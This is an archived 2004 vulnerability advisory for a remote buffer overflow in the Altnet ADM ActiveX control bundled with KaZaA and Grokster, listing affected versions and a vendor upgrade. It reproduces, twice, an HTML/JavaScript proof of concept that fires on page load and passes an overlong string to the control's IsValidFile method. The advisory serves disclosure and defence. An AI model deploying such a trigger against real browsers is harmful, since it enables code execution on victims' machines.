Altnet ADM ActiveX Control Remote Buffer Overflow Vulnerability
BID:11101
Info
Altnet ADM ActiveX Control Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 11101 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 03 2004 12:00AM |
| Updated: | Sep 03 2004 12:00AM |
| Credit: | Discovery is credited to celebrityhacker <[email protected]>. |
| Vulnerable: |
KaZaA KaZaA Media Desktop 2.6.4 KaZaA KaZaA Media Desktop 2.0.2 KaZaA KaZaA Media Desktop 2.0 KaZaA KaZaA Media Desktop 1.6.1 KaZaA KaZaA Media Desktop 1.3.2 KaZaA KaZaA Media Desktop 1.3.1 KaZaA KaZaA Media Desktop 1.3 Grokster Grokster 2.6 Grokster Grokster 1.3.3 Grokster Grokster 1.3 Altnet ADM |
| Not Vulnerable: | |
Discussion
Altnet ADM ActiveX Control Remote Buffer Overflow Vulnerability
Altnet is reported prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.
Altnet is reported prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.
Exploit / POC
Altnet ADM ActiveX Control Remote Buffer Overflow Vulnerability
The following proof of concept is available:
<HTML>
<HEAD>
This overrun occurs in \program files\Altnet\Download Manager\adm.exe
This executable is installed along with Kazaa and Grokster.
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>
function init()
{
var foo = "";
for(var icount = 0; icount < 1; icount++)
{
foo = foo +
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxxxx";
}
var ngssoftware;
ngssoftware = new ActiveXObject("ADM.ADM.1");
ngssoftware["IsValidFile"](foo);
}
//-->
</SCRIPT>
</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>
The following proof of concept is available:
<HTML>
<HEAD>
This overrun occurs in \program files\Altnet\Download Manager\adm.exe
This executable is installed along with Kazaa and Grokster.
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>
function init()
{
var foo = "";
for(var icount = 0; icount < 1; icount++)
{
foo = foo +
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxxxx";
}
var ngssoftware;
ngssoftware = new ActiveXObject("ADM.ADM.1");
ngssoftware["IsValidFile"](foo);
}
//-->
</SCRIPT>
</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>
Solution / Fix
Altnet ADM ActiveX Control Remote Buffer Overflow Vulnerability
Solution:
It is reported that the vendor has released an upgrade to address this issue.
Altnet ADM
Solution:
It is reported that the vendor has released an upgrade to address this issue.
Altnet ADM
-
Altnet ADM Update
http://www.altnet.com/install/upgrade.asp